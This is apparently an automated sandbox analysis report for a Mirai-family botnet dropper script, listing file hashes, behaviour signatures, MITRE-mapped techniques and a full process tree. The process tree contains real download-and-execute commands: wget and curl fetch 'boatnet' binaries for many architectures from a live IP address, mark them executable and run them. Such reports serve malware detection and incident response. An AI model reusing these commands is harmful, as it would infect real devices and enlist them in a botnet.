Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    12-01-2025 14:35

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    e25f891adc7a50ef0de34587b5d59e24

  • SHA1

    90118fabbbb484f6d7e3d94d5128cac84ca384d5

  • SHA256

    cb69d62b52dd6917dbde67db70d37db577ea3fa002bb6f9fd6d88354f84a5a57

  • SHA512

    cdd371403ebe19b4fc4a57fe5f48cf967f3baa2b11c8ab6abc69734c631209d8a1c45f17053d2f07e8fd5efe0f17420d661261b820fb07b01f820761270d13e0

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 15 IoCs
  • Modifies Watchdog functionality 1 TTPs 30 IoCs

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Writes file to system bin folder 30 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 30 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:1512
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:1513
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:1517
    • /bin/cat
      cat boatnet.x86
      2⤵
      PID:1518
    • /bin/chmod
      chmod +x boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1519
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1520
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:1524
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:1525
    • /bin/chmod
      chmod +x boatnet.mips boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1527
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1528
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.arc
      2⤵
      • Writes file to tmp directory
      PID:1532
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.arc
      2⤵
      • Writes file to tmp directory
      PID:1533
    • /bin/chmod
      chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-GJYZhK systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1541
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1542
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.i468
      2⤵
      PID:1546
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.i468
      2⤵
      • Writes file to tmp directory
      PID:1547
    • /bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-GJYZhK systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1549
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1550
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.i686
      2⤵
      • Writes file to tmp directory
      PID:1554
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.i686
      2⤵
      • Writes file to tmp directory
      PID:1561
    • /bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-biJf8d systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1563
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1564
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.x86_64
      2⤵
      • Writes file to tmp directory
      PID:1568
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.x86_64
      2⤵
      • Writes file to tmp directory
      PID:1569
    • /bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-phqvhA systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1595
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1596
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.mpsl
      2⤵
      • Writes file to tmp directory
      PID:1600
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.mpsl
      2⤵
      • Writes file to tmp directory
      PID:1607
    • /bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-8qhydC systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1609
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1610
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.arm
      2⤵
      • Writes file to tmp directory
      PID:1614
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.arm
      2⤵
      • Writes file to tmp directory
      PID:1615
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-8qhydC systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1617
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1618
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.arm5
      2⤵
      • Writes file to tmp directory
      PID:1622
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.arm5
      2⤵
      • Writes file to tmp directory
      PID:1623
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1633
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1634
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.arm6
      2⤵
      • Writes file to tmp directory
      PID:1638
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.arm6
      2⤵
      • Writes file to tmp directory
      PID:1643
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-SbxxeJ systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1645
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1646
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.arm7
      2⤵
      • Writes file to tmp directory
      PID:1650
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.arm7
      2⤵
      • Writes file to tmp directory
      PID:1651
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-rhVjAA systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1659
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1660
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.ppc
      2⤵
      • Writes file to tmp directory
      PID:1664
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.ppc
      2⤵
      • Writes file to tmp directory
      PID:1667
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1669
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1670
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.spc
      2⤵
      • Writes file to tmp directory
      PID:1674
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.spc
      2⤵
      • Writes file to tmp directory
      PID:1675
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1677
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1678
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.m68k
      2⤵
      • Writes file to tmp directory
      PID:1682
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.m68k
      2⤵
      • Writes file to tmp directory
      PID:1683
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1687
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1688
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.sh4
      2⤵
      • Writes file to tmp directory
      PID:1692
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.sh4
      2⤵
      • Writes file to tmp directory
      PID:1693
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa WTF
      2⤵
      • File and Directory Permissions Modification
      PID:1695
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:1696

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/boatnet.x86

    Filesize

    29KB

    MD5

    545dbe1d228295c958b5a3f6ec4d8278

    SHA1

    f8dff366ea07681be596cdb33911c3f4119d0763

    SHA256

    a8cbba23e7c866ccf3dc8b4d4e1cc5a51de83272cb6f8df8746a51a2817d8f7b

    SHA512

    fe2115ad64b5755a4b4d71660d8de94c0a7f3f7d9eb3519a6e82216621f83d0855a32c41963b22dabac02e9d82c95cca8efce568d2fdafd8123e4f443c335a3f